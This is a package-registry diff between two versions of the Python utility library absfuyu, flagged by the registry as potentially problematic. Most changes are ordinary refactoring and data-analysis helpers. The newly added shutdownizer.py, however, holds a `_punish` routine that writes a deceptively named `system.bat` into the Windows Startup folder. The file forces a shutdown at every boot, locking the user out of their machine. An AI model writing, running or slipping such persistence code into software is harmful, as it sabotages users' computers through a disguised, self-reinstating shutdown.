absfuyu 3.2.0__py3-none-any.whl → 3.3.3__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of absfuyu might be problematic. Click here for more details.

Files changed (61) hide show
  1. absfuyu/__init__.py +3 -10
  2. absfuyu/__main__.py +5 -250
  3. absfuyu/cli/__init__.py +51 -0
  4. absfuyu/cli/color.py +24 -0
  5. absfuyu/cli/config_group.py +56 -0
  6. absfuyu/cli/do_group.py +76 -0
  7. absfuyu/cli/game_group.py +109 -0
  8. absfuyu/config/__init__.py +55 -94
  9. absfuyu/config/config.json +0 -7
  10. absfuyu/core.py +5 -66
  11. absfuyu/everything.py +7 -9
  12. absfuyu/extensions/beautiful.py +30 -23
  13. absfuyu/extensions/dev/__init__.py +11 -8
  14. absfuyu/extensions/dev/password_hash.py +4 -2
  15. absfuyu/extensions/dev/passwordlib.py +7 -5
  16. absfuyu/extensions/dev/project_starter.py +4 -2
  17. absfuyu/extensions/dev/shutdownizer.py +148 -0
  18. absfuyu/extensions/extra/__init__.py +1 -2
  19. absfuyu/extensions/extra/data_analysis.py +110 -58
  20. absfuyu/fun/WGS.py +50 -26
  21. absfuyu/fun/__init__.py +6 -7
  22. absfuyu/fun/tarot.py +1 -1
  23. absfuyu/game/__init__.py +75 -81
  24. absfuyu/game/game_stat.py +36 -0
  25. absfuyu/game/sudoku.py +41 -48
  26. absfuyu/game/tictactoe.py +303 -548
  27. absfuyu/game/wordle.py +56 -47
  28. absfuyu/general/__init__.py +17 -7
  29. absfuyu/general/content.py +16 -15
  30. absfuyu/general/data_extension.py +282 -90
  31. absfuyu/general/generator.py +67 -67
  32. absfuyu/general/human.py +74 -78
  33. absfuyu/logger.py +94 -68
  34. absfuyu/pkg_data/__init__.py +29 -25
  35. absfuyu/py.typed +0 -0
  36. absfuyu/sort.py +61 -47
  37. absfuyu/tools/__init__.py +0 -1
  38. absfuyu/tools/converter.py +80 -62
  39. absfuyu/tools/keygen.py +62 -67
  40. absfuyu/tools/obfuscator.py +57 -53
  41. absfuyu/tools/stats.py +24 -24
  42. absfuyu/tools/web.py +10 -9
  43. absfuyu/util/__init__.py +38 -40
  44. absfuyu/util/api.py +53 -43
  45. absfuyu/util/json_method.py +25 -27
  46. absfuyu/util/lunar.py +20 -24
  47. absfuyu/util/path.py +362 -241
  48. absfuyu/util/performance.py +36 -98
  49. absfuyu/util/pkl.py +8 -8
  50. absfuyu/util/zipped.py +17 -19
  51. absfuyu/version.py +137 -148
  52. absfuyu-3.3.3.dist-info/METADATA +124 -0
  53. absfuyu-3.3.3.dist-info/RECORD +59 -0
  54. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info}/WHEEL +1 -2
  55. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info}/entry_points.txt +1 -0
  56. {absfuyu-3.2.0.dist-info → absfuyu-3.3.3.dist-info/licenses}/LICENSE +1 -1
  57. absfuyu/extensions/dev/pkglib.py +0 -98
  58. absfuyu/game/tictactoe2.py +0 -318
  59. absfuyu-3.2.0.dist-info/METADATA +0 -216
  60. absfuyu-3.2.0.dist-info/RECORD +0 -55
  61. absfuyu-3.2.0.dist-info/top_level.txt +0 -1
@@ -1,12 +1,14 @@
1
+ # type: ignore
2
+ # flake8: noqa
3
+
1
4
  # Library
2
5
  ##############################################################
3
6
  import hashlib as __hash
4
7
  import os as __os
5
8
  from typing import Dict as __Dict
9
+ from typing import NewType as __NewType
6
10
  from typing import TypeVar as __TypeVar
7
11
  from typing import Union as __Union
8
- from typing import NewType as __NewType
9
-
10
12
 
11
13
  # Define type
12
14
  ##############################################################
@@ -1,3 +1,6 @@
1
+ # type: ignore
2
+ # flake8: noqa
3
+
1
4
  """
2
5
  Absfuyu: Passwordlib
3
6
  --------------------
@@ -7,7 +10,6 @@ Version: 1.0.0dev1
7
10
  Date updated: 30/11/2023 (dd/mm/yyyy)
8
11
  """
9
12
 
10
-
11
13
  # Library
12
14
  ###########################################################################
13
15
  # from collections import namedtuple
@@ -15,13 +17,13 @@ import hashlib
15
17
  import os
16
18
  import random
17
19
  import re
18
- from typing import List, Dict, Optional, Union
20
+ from typing import List, Optional
19
21
 
20
22
  from absfuyu_res import DATA
21
23
 
22
- from absfuyu.logger import logger
23
24
  from absfuyu.general.data_extension import DictExt, Text
24
- from absfuyu.general.generator import Generator, Charset
25
+ from absfuyu.general.generator import Charset, Generator
26
+ from absfuyu.logger import logger
25
27
  from absfuyu.util import set_min
26
28
  from absfuyu.util.pkl import Pickler
27
29
 
@@ -237,7 +239,7 @@ class Password:
237
239
  if first_letter_cap:
238
240
  value = value.title()
239
241
  if include_number:
240
- value += str(random.choice(range(0, 10)))
242
+ value += str(random.choice(range(10)))
241
243
  return value
242
244
 
243
245
  if not block_divider:
@@ -1,3 +1,6 @@
1
+ # type: ignore
2
+ # flake8: noqa
3
+
1
4
  """
2
5
  Absfuyu: Project starter
3
6
  ------------------------
@@ -6,7 +9,6 @@ Version: 1.0.0dev1
6
9
  Date updated: 01/12/2023 (dd/mm/yyyy)
7
10
  """
8
11
 
9
-
10
12
  # Module level
11
13
  ###########################################################################
12
14
  __all__ = ["get_parser"]
@@ -14,7 +16,7 @@ __all__ = ["get_parser"]
14
16
 
15
17
  # Library
16
18
  ###########################################################################
17
- from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
19
+ from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
18
20
  from typing import Optional
19
21
 
20
22
 
@@ -1,3 +1,6 @@
1
+ # type: ignore
2
+ # flake8: noqa
3
+
1
4
  """
2
5
  Absfuyu: Shutdownizer
3
6
  ---------------------
@@ -6,3 +9,148 @@ This shutdowns
6
9
  Version: 1.0.0dev
7
10
  Date updated: 27/11/2023 (dd/mm/yyyy)
8
11
  """
12
+
13
+ # Module level
14
+ ###########################################################################
15
+ __all__ = ["ShutDownizer"]
16
+
17
+
18
+ # Library
19
+ ###########################################################################
20
+ import datetime
21
+ import os
22
+ import random
23
+ import subprocess
24
+ import sys
25
+ from pathlib import Path
26
+
27
+ from absfuyu.logger import LogLevel, logger
28
+
29
+
30
+ # Class
31
+ ###########################################################################
32
+ class Dummy:
33
+ def __init__(self) -> None:
34
+ pass
35
+
36
+ def __str__(self) -> str:
37
+ return f"{self.__class__.__name__}()"
38
+
39
+ def __repr__(self) -> str:
40
+ return self.__str__()
41
+
42
+
43
+ class ShutDownizer(Dummy):
44
+ """
45
+ ShutDownizer
46
+
47
+ Shutdown tool because why not
48
+ """
49
+
50
+ def __init__(self) -> None:
51
+ """doc_string"""
52
+ self.os: str = sys.platform
53
+ logger.debug(f"Current OS: {self.os}")
54
+
55
+ if self.os in ["win32", "cygwin"]: # Windows
56
+ self.engine = ShutDownizerWin()
57
+ elif self.os == "darwin": # MacOS
58
+ self.engine = ShutDownizerMac()
59
+ elif self.os == "linux": # Linux
60
+ self.engine = ShutDownizerLinux()
61
+ else: # Other (probably linux)
62
+ self.engine = ShutDownizerLinux()
63
+
64
+ def __str__(self) -> str:
65
+ return f"{self.__class__.__name__}({self.os})"
66
+
67
+ def shutdown(self):
68
+ """Shutdown"""
69
+ self.engine.shutdown()
70
+
71
+ def restart(self):
72
+ """Restart"""
73
+ self.engine.restart()
74
+
75
+ def cancel(self):
76
+ """Cancel"""
77
+ self.engine.cancel()
78
+
79
+
80
+ class ShutDownizerEngine(Dummy):
81
+ """
82
+ Abstract class for different type of OS
83
+ """
84
+
85
+ def __init__(self) -> None:
86
+ self.shutdown_cmd = ""
87
+ self.restart_cmd = ""
88
+ self.cancel_cmd = ""
89
+
90
+ def _excute_cmd(self, cmd) -> None:
91
+ """Execute the cmd"""
92
+ try:
93
+ if isinstance(cmd, str):
94
+ subprocess.run(cmd.split())
95
+ elif isinstance(cmd, list):
96
+ subprocess.run(cmd)
97
+ else:
98
+ logger.error(f'"{cmd}" failed to run')
99
+ except:
100
+ logger.error(f'"{cmd}" failed to run')
101
+
102
+ def shutdown(self):
103
+ """Shutdown"""
104
+ try:
105
+ self._excute_cmd(self.shutdown_cmd)
106
+ except:
107
+ pass
108
+
109
+ def restart(self):
110
+ """Restart"""
111
+ self._excute_cmd(self.restart_cmd)
112
+
113
+ def cancel(self):
114
+ """Cancel shutdown/restart"""
115
+ self._excute_cmd(self.cancel_cmd)
116
+
117
+
118
+ class ShutDownizerWin(ShutDownizerEngine):
119
+ """ShutDownizer - Windows"""
120
+
121
+ def __init__(self) -> None:
122
+ self.shutdown_cmd = "shutdown -f -s -t 0"
123
+ self.cancel_cmd = "shutdown -a"
124
+
125
+ def _punish(self):
126
+ """Create a `batch` script that shut down computer when boot up"""
127
+ try:
128
+ startup_folder_win = Path(os.getenv("appdata")).joinpath(
129
+ "Microsoft", "Windows", "Start Menu", "Programs", "Startup"
130
+ )
131
+ with open(startup_folder_win.joinpath("system.bat"), "w") as f:
132
+ f.write(self.shutdown_cmd)
133
+ except:
134
+ logger.error("Cannot write file to startup folder")
135
+
136
+
137
+ class ShutDownizerMac(ShutDownizerEngine):
138
+ """ShutDownizer - MacOS"""
139
+
140
+ def __init__(self) -> None:
141
+ self.shutdown_cmd = ["osascript", "-e", 'tell app "System Events" to shut down']
142
+
143
+
144
+ class ShutDownizerLinux(ShutDownizerEngine):
145
+ """ShutDownizer - Linux"""
146
+
147
+ def __init__(self) -> None:
148
+ self.shutdown_cmd = "shutdown -h now"
149
+
150
+
151
+ # Run
152
+ ###########################################################################
153
+ if __name__ == "__main__":
154
+ logger.setLevel(LogLevel.DEBUG)
155
+ test = ShutDownizer()
156
+ print(ShutDownizerLinux().shutdown())
@@ -18,8 +18,7 @@ Date updated: 24/11/2023 (dd/mm/yyyy)
18
18
  # Function
19
19
  ###########################################################################
20
20
 
21
-
22
21
  # Run
23
22
  ###########################################################################
24
23
  if __name__ == "__main__":
25
- pass
24
+ pass
@@ -3,11 +3,10 @@ Absfuyu: Data Analysis [W.I.P]
3
3
  ------------------------------
4
4
  Extension for ``pd.DataFrame``
5
5
 
6
- Version: 2.1.1
7
- Date updated: 14/03/2024 (dd/mm/yyyy)
6
+ Version: 2.1.3
7
+ Date updated: 20/03/2024 (dd/mm/yyyy)
8
8
  """
9
9
 
10
-
11
10
  # Module level
12
11
  ###########################################################################
13
12
  __all__ = [
@@ -26,27 +25,30 @@ __all__ = [
26
25
 
27
26
  # Library
28
27
  ###########################################################################
28
+ import random
29
+ import string
29
30
  from collections import deque
30
31
  from datetime import datetime
31
- import random
32
32
  from itertools import chain, product
33
- import string
34
33
  from typing import Any, Dict, List, NamedTuple, Optional, Union
35
34
 
36
35
  # import matplotlib.pyplot as plt
37
36
  # from scipy import stats
38
37
  # from dateutil.relativedelta import relativedelta
39
- from deprecated import deprecated
40
38
  import numpy as np
41
39
  import pandas as pd
40
+ from deprecated import deprecated
41
+ from deprecated.sphinx import deprecated as sphinx_deprecated
42
+ from deprecated.sphinx import versionadded
42
43
 
43
44
  from absfuyu.logger import logger
44
- from absfuyu.util import set_min_max, set_min
45
+ from absfuyu.util import set_min, set_min_max
45
46
 
46
47
 
47
48
  # Function
48
49
  ###########################################################################
49
- @deprecated(reason="No needed", version="3.1.0")
50
+ @deprecated(reason="Not needed", version="3.1.0")
51
+ @sphinx_deprecated(reason="Not needed", version="3.1.0")
50
52
  def summary(data: Union[list, np.ndarray]): # del this
51
53
  """
52
54
  Quick summary of data
@@ -95,7 +97,7 @@ def equalize_df(data: Dict[str, list], fillna=np.nan) -> Dict[str, list]:
95
97
  ## Update 05/10
96
98
 
97
99
 
98
- def compare_2_list(*arr: list) -> pd.DataFrame:
100
+ def compare_2_list(*arr) -> pd.DataFrame:
99
101
  """
100
102
  Compare 2 lists then create DataFrame
101
103
  to see which items are missing
@@ -112,7 +114,7 @@ def compare_2_list(*arr: list) -> pd.DataFrame:
112
114
  """
113
115
  # Setup
114
116
  col_name = "list"
115
- arr = [sorted(x) for x in arr] # map(sorted, arr)
117
+ arr = [sorted(x) for x in arr] # type: ignore # map(sorted, arr)
116
118
 
117
119
  # Total array
118
120
  tarr = sorted(list(set(chain.from_iterable(arr))))
@@ -180,33 +182,33 @@ class CityData(NamedTuple):
180
182
  area: str
181
183
 
182
184
  @staticmethod
183
- def _sample_city_data(size: int = 100):
185
+ def _sample_city_data(size: int = 100) -> List["CityData"]:
184
186
  """
185
187
  Generate sample city data (testing purpose)
186
188
  """
187
189
  sample_range = 10 ** len(str(size))
188
190
 
189
191
  # Serial list
190
- serials = []
191
- while len(serials) != size: # Unique serial
192
+ serials: List[str] = []
193
+ while len(serials) != size: # Unique serial
192
194
  serial = random.randint(0, sample_range - 1)
193
- serial = str(serial).rjust(len(str(size)), "0")
194
- if serial not in serials:
195
- serials.append(serial)
196
-
197
- ss2 = deque(serials[: int(len(serials) / 2)]) # Cut half for region
195
+ serial = str(serial).rjust(len(str(size)), "0") # type: ignore
196
+ if serial not in serials: # type: ignore
197
+ serials.append(serial) # type: ignore
198
+
199
+ ss2 = deque(serials[: int(len(serials) / 2)]) # Cut half for region
198
200
  ss2.rotate(random.randrange(1, 5))
199
- [ss2.extend(ss2) for _ in range(2)] # Extend back
201
+ [ss2.extend(ss2) for _ in range(2)] # type: ignore # Extend back
200
202
 
201
- ss3 = deque(serials[: int(len(serials) / 4)]) # Cut forth for area
203
+ ss3 = deque(serials[: int(len(serials) / 4)]) # Cut forth for area
202
204
  ss3.rotate(random.randrange(1, 5))
203
- [ss3.extend(ss3) for _ in range(4)] # Extend back
205
+ [ss3.extend(ss3) for _ in range(4)] # type: ignore # Extend back
204
206
 
205
207
  serials = ["city_" + x for x in serials]
206
- ss2 = ["region_" + x for x in ss2]
207
- ss3 = ["area_" + x for x in ss3]
208
+ ss2 = ["region_" + x for x in ss2] # type: ignore
209
+ ss3 = ["area_" + x for x in ss3] # type: ignore
208
210
 
209
- ss = list(zip(serials, ss2, ss3)) # Zip back
211
+ ss = list(zip(serials, ss2, ss3)) # Zip back
210
212
  out = list(map(CityData._make, ss))
211
213
 
212
214
  return out
@@ -267,7 +269,7 @@ class SplittedDF(NamedTuple):
267
269
  DataFrame
268
270
  Joined DataFrame
269
271
  """
270
- return self.concat_df(self, join=join)
272
+ return self.concat_df(self, join=join) # type: ignore
271
273
 
272
274
  @staticmethod
273
275
  def divide_dataframe(df: pd.DataFrame, by_column: str) -> List[pd.DataFrame]:
@@ -320,10 +322,10 @@ class _DictToAtrr:
320
322
  if key_as_atrribute:
321
323
  # temp = list(map(self._remove_space, self._data.keys()))
322
324
  temp = [self._remove_space(x, remove_char) for x in self._data.keys()]
323
- [self.__setattr__(k, v) for k, v in zip(temp, self._data.values())]
325
+ [self.__setattr__(k, v) for k, v in zip(temp, self._data.values())] # type: ignore
324
326
  else:
325
327
  temp = [self._remove_space(x, remove_char) for x in self._data.values()]
326
- [self.__setattr__(k, v) for k, v in zip(temp, self._data.keys())]
328
+ [self.__setattr__(k, v) for k, v in zip(temp, self._data.keys())] # type: ignore
327
329
  self._keys = temp
328
330
 
329
331
  def __str__(self) -> str:
@@ -337,7 +339,7 @@ class _DictToAtrr:
337
339
  """
338
340
  Remove special characters and replace space with underscore
339
341
  """
340
- remove_char = remove_char.split(" ")
342
+ remove_char = remove_char.split(" ") # type: ignore
341
343
  logger.debug(remove_char)
342
344
  for x in remove_char:
343
345
  value = value.replace(x, "")
@@ -400,15 +402,15 @@ class MatplotlibFormatString:
400
402
  @staticmethod
401
403
  def all_format_string() -> List[PLTFormatString]:
402
404
  fmt_str = [
403
- __class__.MARKER_LIST,
404
- __class__.LINE_STYLE_LIST,
405
- __class__.COLOR_LIST,
405
+ __class__.MARKER_LIST, # type: ignore
406
+ __class__.LINE_STYLE_LIST, # type: ignore
407
+ __class__.COLOR_LIST, # type: ignore
406
408
  ]
407
409
  return [PLTFormatString._make(x) for x in list(product(*fmt_str))]
408
410
 
409
411
  @staticmethod
410
412
  def get_random(alt: bool = False) -> str:
411
- temp = random.choice(__class__.all_format_string())
413
+ temp = random.choice(__class__.all_format_string()) # type: ignore
412
414
  if alt:
413
415
  return f"{temp.marker}{temp.line_style}{temp.color}"
414
416
  else:
@@ -418,9 +420,9 @@ class MatplotlibFormatString:
418
420
  # Class - DA
419
421
  ###########################################################################
420
422
  class DataAnalystDataFrame(pd.DataFrame):
421
- """Data Analyst ``pd.DataFrame``"""
422
-
423
- _DADF_Version = (1, 3, 0) # internal check
423
+ """
424
+ Data Analyst ``pd.DataFrame``
425
+ """
424
426
 
425
427
  # Support
426
428
  # ================================================================
@@ -443,14 +445,14 @@ class DataAnalystDataFrame(pd.DataFrame):
443
445
  Modified DataFrame
444
446
  """
445
447
  cols = self.columns.to_list() # List of columns
446
- num_of_cols = set_min_max(num_of_cols, min_value=1, max_value=len(cols))
448
+ num_of_cols = int(set_min_max(num_of_cols, min_value=1, max_value=len(cols)))
447
449
  col_index = cols.index(insert_to_col)
448
450
  cols = (
449
451
  cols[: col_index + 1]
450
452
  + cols[-num_of_cols:]
451
453
  + cols[col_index + 1 : len(cols) - num_of_cols]
452
454
  )
453
- self = __class__(self[cols])
455
+ self = self.__class__(self[cols])
454
456
  return self
455
457
 
456
458
  # Drop a list of column
@@ -471,7 +473,7 @@ class DataAnalystDataFrame(pd.DataFrame):
471
473
  for column in columns:
472
474
  try:
473
475
  self.drop(columns=[column], inplace=True)
474
- except:
476
+ except Exception:
475
477
  logger.debug(f"{column} column does not exist")
476
478
  # pass
477
479
  return self
@@ -496,7 +498,9 @@ class DataAnalystDataFrame(pd.DataFrame):
496
498
  # num_of_cols = 1
497
499
  # if num_of_cols > self.shape[1]:
498
500
  # num_of_cols = self.shape[1]
499
- num_of_cols = set_min_max(num_of_cols, min_value=1, max_value=self.shape[1])
501
+ num_of_cols = int(
502
+ set_min_max(num_of_cols, min_value=1, max_value=self.shape[1])
503
+ )
500
504
 
501
505
  # Logic
502
506
  for _ in range(num_of_cols):
@@ -530,9 +534,9 @@ class DataAnalystDataFrame(pd.DataFrame):
530
534
  def convert_city(
531
535
  self,
532
536
  city_column: str,
533
- city_list: List[CityData] = None,
537
+ city_list: List[CityData],
534
538
  *,
535
- mode: str = "ra"
539
+ mode: str = "ra",
536
540
  ):
537
541
  """
538
542
  Get ``region`` and ``area`` of a city
@@ -559,21 +563,25 @@ class DataAnalystDataFrame(pd.DataFrame):
559
563
  """
560
564
 
561
565
  # Support function
562
- def _convert_city_support(value: str):
566
+ def _convert_city_support(value: str) -> CityData:
563
567
  for x in city_list:
564
568
  if x.city.lower().startswith(value.lower()):
565
569
  return x
566
- return CityData(city=value, region=np.nan, area=np.nan)
570
+ return CityData(city=value, region=np.nan, area=np.nan) # type: ignore
567
571
 
568
572
  # Convert
569
573
  col_counter = 0
570
574
  if mode.find("r") != -1:
571
575
  logger.debug("Mode: 'region'")
572
- self["region"] = self[city_column].apply(lambda x: _convert_city_support(x).region)
576
+ self["region"] = self[city_column].apply(
577
+ lambda x: _convert_city_support(x).region
578
+ )
573
579
  col_counter += 1
574
580
  if mode.find("a") != -1:
575
581
  logger.debug("Mode: 'area'")
576
- self["area"] = self[city_column].apply(lambda x: _convert_city_support(x).area)
582
+ self["area"] = self[city_column].apply(
583
+ lambda x: _convert_city_support(x).area
584
+ )
577
585
  col_counter += 1
578
586
 
579
587
  # Rearrange
@@ -731,7 +739,7 @@ class DataAnalystDataFrame(pd.DataFrame):
731
739
  """
732
740
  try:
733
741
  self[column_name] = self[column_name].fillna(fill)
734
- except:
742
+ except Exception:
735
743
  self.add_blank_column(column_name, fill_when_not_exist)
736
744
  return self
737
745
 
@@ -759,6 +767,7 @@ class DataAnalystDataFrame(pd.DataFrame):
759
767
  return out
760
768
 
761
769
  # Threshold filter
770
+ # @versionchanged(version="3.2.0", reason="Optimized the code")
762
771
  def threshold_filter(
763
772
  self,
764
773
  destination_column: str,
@@ -799,7 +808,7 @@ class DataAnalystDataFrame(pd.DataFrame):
799
808
  self[destination_column] = self[
800
809
  destination_column
801
810
  ].str.strip() # Remove trailing space
802
- except:
811
+ except Exception:
803
812
  pass
804
813
 
805
814
  # Logic
@@ -814,7 +823,7 @@ class DataAnalystDataFrame(pd.DataFrame):
814
823
  )
815
824
  # logger.debug(list_of_keep)
816
825
  else:
817
- list_of_keep: list = col_df[col_df["percentage"] >= threshold][
826
+ list_of_keep = col_df[col_df["percentage"] >= threshold][
818
827
  destination_column
819
828
  ].to_list() # values that will not be renamed
820
829
  self[f"{destination_column}_filtered"] = self[destination_column].apply(
@@ -828,11 +837,13 @@ class DataAnalystDataFrame(pd.DataFrame):
828
837
  # ================================================================
829
838
  # Total observation
830
839
  @property
840
+ @versionadded(version="3.2.0")
831
841
  def total_observation(self) -> int:
832
842
  """Returns total observation of the DataFrame"""
833
- return self.shape[0] * self.shape[1]
843
+ return self.shape[0] * self.shape[1] # type: ignore
834
844
 
835
845
  # Quick info
846
+ @versionadded(version="3.2.0")
836
847
  def qinfo(self) -> str:
837
848
  """
838
849
  Show quick infomation about DataFrame
@@ -850,6 +861,7 @@ class DataAnalystDataFrame(pd.DataFrame):
850
861
  return info
851
862
 
852
863
  # Quick describe
864
+ @versionadded(version="3.2.0")
853
865
  def qdescribe(self) -> pd.DataFrame:
854
866
  """
855
867
  Quick ``describe()`` that exclude ``object`` and ``datetime`` dtype
@@ -887,7 +899,9 @@ class DataAnalystDataFrame(pd.DataFrame):
887
899
  else:
888
900
  out = df_na.to_frame()
889
901
  out.rename(columns={0: "Num of N/A"}, inplace=True)
890
- out["Percentage"] = (out["Num of N/A"] / self.shape[0] * 100).round(percentage_round_up)
902
+ out["Percentage"] = (out["Num of N/A"] / self.shape[0] * 100).round(
903
+ percentage_round_up
904
+ )
891
905
 
892
906
  # logger.debug(
893
907
  # f"Percentage of N/A over entire DF: "
@@ -896,13 +910,14 @@ class DataAnalystDataFrame(pd.DataFrame):
896
910
  return out
897
911
 
898
912
  # Show distribution
913
+ @versionadded(version="3.2.0")
899
914
  def show_distribution(
900
- self,
901
- column_name: str,
915
+ self,
916
+ column_name: str,
902
917
  dropna: bool = True,
903
- *,
918
+ *,
904
919
  show_percentage: bool = True,
905
- percentage_round_up: int = 2
920
+ percentage_round_up: int = 2,
906
921
  ) -> pd.DataFrame:
907
922
  """
908
923
  Show distribution of a column
@@ -928,12 +943,31 @@ class DataAnalystDataFrame(pd.DataFrame):
928
943
  -------
929
944
  DataFrame
930
945
  Distribution DataFrame
946
+
947
+
948
+ Example:
949
+ --------
950
+ >>> DataAnalystDataFrame.sample_df().show_distribution("number_range")
951
+ number_range count percentage
952
+ 0 900 16 16.0
953
+ 1 700 15 15.0
954
+ 2 300 12 12.0
955
+ 3 200 12 12.0
956
+ 4 400 11 11.0
957
+ 5 600 11 11.0
958
+ 6 800 10 10.0
959
+ 7 100 9 9.0
960
+ 8 500 4 4.0
931
961
  """
932
962
  out = self[column_name].value_counts(dropna=dropna).to_frame().reset_index()
933
963
  if show_percentage:
934
- out["percentage"] = (out["count"] / self.shape[0] * 100).round(percentage_round_up)
964
+ out["percentage"] = (out["count"] / self.shape[0] * 100).round(
965
+ percentage_round_up
966
+ )
935
967
  else:
936
- out["percentage"] = (out["count"] / self.shape[0]).round(percentage_round_up)
968
+ out["percentage"] = (out["count"] / self.shape[0]).round(
969
+ percentage_round_up
970
+ )
937
971
  return out
938
972
 
939
973
  # Help
@@ -942,7 +976,7 @@ class DataAnalystDataFrame(pd.DataFrame):
942
976
  """
943
977
  Show all available method of DataAnalystDataFrame
944
978
  """
945
- list_of_method = list(set(dir(__class__)) - set(dir(pd.DataFrame)))
979
+ list_of_method = list(set(dir(__class__)) - set(dir(pd.DataFrame))) # type: ignore
946
980
  return sorted(list_of_method)
947
981
 
948
982
  # Sample DataFrame
@@ -962,9 +996,27 @@ class DataAnalystDataFrame(pd.DataFrame):
962
996
  DataAnalystDataFrame
963
997
  DataFrame with these columns:
964
998
  [number, number_big, number_range, missing_value, text, date]
999
+
1000
+
1001
+ Example:
1002
+ --------
1003
+ >>> DataAnalystDataFrame.sample_df()
1004
+ number number_big number_range missing_value text date
1005
+ 0 -2.089770 785 700 NaN vwnlqoql 2013-11-20
1006
+ 1 -0.526689 182 100 24.0 prjjcvqc 2007-04-13
1007
+ 2 -1.596514 909 900 8.0 cbcpzlac 2023-05-24
1008
+ 3 2.982191 989 900 21.0 ivwqwuvd 2022-04-28
1009
+ 4 1.687803 878 800 NaN aajtncum 2005-10-05
1010
+ .. ... ... ... ... ... ...
1011
+ 95 -1.295145 968 900 16.0 mgqunkhi 2016-04-12
1012
+ 96 1.296795 255 200 NaN lwvytego 2014-05-10
1013
+ 97 1.440746 297 200 5.0 lqsoykun 2010-04-03
1014
+ 98 0.327702 845 800 NaN leadkvsy 2005-08-05
1015
+ 99 0.556720 981 900 36.0 bozmxixy 2004-02-22
1016
+ [100 rows x 6 columns]
965
1017
  """
966
1018
  # Restrain
967
- size = set_min(size, min_value=1)
1019
+ size = int(set_min(size, min_value=1))
968
1020
 
969
1021
  # Number col
970
1022
  df = pd.DataFrame(np.random.randn(size, 1), columns=["number"])